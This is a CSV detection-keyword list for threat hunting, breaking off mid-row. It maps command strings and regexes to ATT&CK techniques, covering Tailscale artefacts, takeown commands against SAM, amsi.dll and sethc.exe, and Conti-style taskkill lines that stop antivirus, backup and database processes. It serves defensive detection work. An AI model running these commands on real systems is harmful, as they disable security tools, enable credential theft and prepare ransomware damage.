"*tailscale/net/dns/",".{0,1000}tailscale\/net\/dns\/","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale/tailscale.go*",".{0,1000}tailscale\/tailscale\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale\net\dns*",".{0,1000}tailscale\\net\\dns.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale\scripts\installer.sh*",".{0,1000}tailscale\\scripts\\installer\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale\tailscale.go*",".{0,1000}tailscale\\tailscale\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 
","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Tailscaled exited*",".{0,1000}Tailscaled\sexited.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscaled.exe*",".{0,1000}tailscaled\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscaled.log*",".{0,1000}tailscaled\.log.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscaled.openrc*",".{0,1000}tailscaled\.openrc.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscaled.sh*",".{0,1000}tailscaled\.sh.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and 
development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscaled.stdout.log*",".{0,1000}tailscaled\.stdout\.log.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscaled_notwindows.go*",".{0,1000}tailscaled_notwindows\.go.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale-ipn.exe*",".{0,1000}tailscale\-ipn\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale-ipn.log.conf*",".{0,1000}tailscale\-ipn\.log\.conf.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense 
Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale-setup-*.exe *",".{0,1000}tailscale\-setup\-.{0,1000}\.exe\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*tailscale-setup-full-*.exe*",".{0,1000}tailscale\-setup\-full\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","1","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*Updating Tailscale from *",".{0,1000}Updating\sTailscale\sfrom\s.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*yum.repos.d/tailscale.repo*",".{0,1000}yum\.repos\.d\/tailscale\.repo.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","N/A","N/A","9","10","18379","1408","2024-08-30T10:02:17Z","2020-01-31T22:00:03Z" "*takeown /f 
""C:\windows\system32\config\SAM""*",".{0,1000}takeown\s\/f\s\""C\:\\windows\\system32\\config\\SAM\"".{0,1000}","greyware_tool_keyword","takeown","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*takeown /f C:\Windows\System32\amsi.dll /a*",".{0,1000}takeown\s\/f\sC\:\\Windows\\System32\\amsi\.dll\s\/a.{0,1000}","greyware_tool_keyword","takeown","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","greyware_tool_keyword","takeown","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","greyware_tool_keyword","takeown","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*TASKKILL /F /FI ""PID ge 1000"" /FI ""WINDOWTITLE ne 
untitled*",".{0,1000}TASKKILL\s\/F\s\/FI\s\""PID\sge\s1000\""\s\/FI\s\""WINDOWTITLE\sne\suntitled.{0,1000}","greyware_tool_keyword","taskkill","forcefully kills processes based on a process ID (PID greater than or equal to 1000) - has been used to disrupt various processes while avoiding certain windows","T1489","TA0040","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","greyware_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM msiexec.exe*",".{0,1000}taskkill\s\/F\s\/IM\smsiexec\.exe.{0,1000}","greyware_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /im agntsvc.exe /F*",".{0,1000}taskkill\s\/im\sagntsvc\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Backup Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /IM CNTAoSMgr.exe /F*",".{0,1000}taskkill\s\/IM\sCNTAoSMgr\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Network Management","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im dbeng50.exe /F*",".{0,1000}taskkill\s\/im\sdbeng50\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im dbsnmp.exe /F*",".{0,1000}taskkill\s\/im\sdbsnmp\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im encsvc.exe /F*",".{0,1000}taskkill\s\/im\sencsvc\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Encryption Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im excel.exe /F*",".{0,1000}taskkill\s\/im\sexcel\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im firefoxconfig.exe 
/F*",".{0,1000}taskkill\s\/im\sfirefoxconfig\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Browser Configuration","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im infopath.exe /F*",".{0,1000}taskkill\s\/im\sinfopath\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im isqlplussvc.exe /F*",".{0,1000}taskkill\s\/im\sisqlplussvc\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /IM mbamtray.exe /F*",".{0,1000}taskkill\s\/IM\smbamtray\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im msaccess.exe /F*",".{0,1000}taskkill\s\/im\smsaccess\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im msftesql.exe /F*",".{0,1000}taskkill\s\/im\smsftesql\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im mspub.exe /F*",".{0,1000}taskkill\s\/im\smspub\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im mydesktopqos.exe /F*",".{0,1000}taskkill\s\/im\smydesktopqos\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Remote Desktop Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im mydesktopservice.exe /F*",".{0,1000}taskkill\s\/im\smydesktopservice\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Remote Desktop Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im 
mysqld.exe /F*",".{0,1000}taskkill\s\/im\smysqld\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im mysqld-nt.exe /F*",".{0,1000}taskkill\s\/im\smysqld\-nt\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im mysqld-opt.exe /F*",".{0,1000}taskkill\s\/im\smysqld\-opt\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /IM Ntrtsc*",".{0,1000}taskkill\s\/IM\sNtrtsc.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im ocautoupds.exe /F*",".{0,1000}taskkill\s\/im\socautoupds\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im ocomm.exe /F*",".{0,1000}taskkill\s\/im\socomm\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im ocssd.exe /F*",".{0,1000}taskkill\s\/im\socssd\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im onenote.exe /F*",".{0,1000}taskkill\s\/im\sonenote\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im oracle.exe /F*",".{0,1000}taskkill\s\/im\soracle\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im outlook.exe 
/F*",".{0,1000}taskkill\s\/im\soutlook\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /IM PccNTMon.exe /F*",".{0,1000}taskkill\s\/IM\sPccNTMon\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im powerpnt.exe /F*",".{0,1000}taskkill\s\/im\spowerpnt\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im savfmsesp.exe /f*",".{0,1000}taskkill\s\/im\ssavfmsesp\.exe\s\/f.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im sqbcoreservice.exe /F*",".{0,1000}taskkill\s\/im\ssqbcoreservice\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Backup","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im sqlagent.exe /F*",".{0,1000}taskkill\s\/im\ssqlagent\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im sqlbrowser.exe /F*",".{0,1000}taskkill\s\/im\ssqlbrowser\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im sqlservr.exe /F*",".{0,1000}taskkill\s\/im\ssqlservr\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Database Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im synctime.exe /F*",".{0,1000}taskkill\s\/im\ssynctime\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Synchronization Service","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im tbirdconfig.exe 
/F*",".{0,1000}taskkill\s\/im\stbirdconfig\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client Configuration","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im thebat.exe /F*",".{0,1000}taskkill\s\/im\sthebat\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im thebat64.exe /F*",".{0,1000}taskkill\s\/im\sthebat64\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im thunderbird.exe /F*",".{0,1000}taskkill\s\/im\sthunderbird\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Email Client","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /IM tmlisten.exe /F*",".{0,1000}taskkill\s\/IM\stmlisten\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Antivirus","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im visio.exe /F*",".{0,1000}taskkill\s\/im\svisio\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im winword.exe /F*",".{0,1000}taskkill\s\/im\swinword\.exe\s\/F.{0,1000}","greyware_tool_keyword","taskkill","stopping Office Application","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","8","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*taskkill /im wordpad.exe 